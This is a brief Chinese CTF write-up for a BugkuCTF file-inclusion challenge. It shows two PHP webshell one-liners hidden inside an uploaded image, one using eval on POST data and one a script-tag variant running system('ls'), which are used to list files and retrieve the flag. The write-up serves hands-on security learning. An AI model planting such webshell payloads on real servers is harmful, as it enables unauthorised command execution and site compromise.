bugkuctf 文件包含2 writeup
程序员文章站
2022-03-04 19:46:28
...
首先看网页源代码,发现
访问upload.php,进入上传页面。
要求上传图片,开始构造一句话图片马。因为初学,一句话不太熟只知道
<?php @eval($_post[a]);?>
把这句话加在图片(改为txt格式)的最后,再改回jpg。上传之后访问该图的存储路径,发现post数据没有反应。显示出来的我的"一句话"语句好像两头被转义了。想了好久不知道怎么办,主要不会更高级的一句话。后再看别人的wp,构造一句话为
<script language=php>system("ls")</script>
上传之后成功过访问图中的txt文件得flag。
上一篇: ctf简单的SQL注入(1)
下一篇: CTF之图片隐写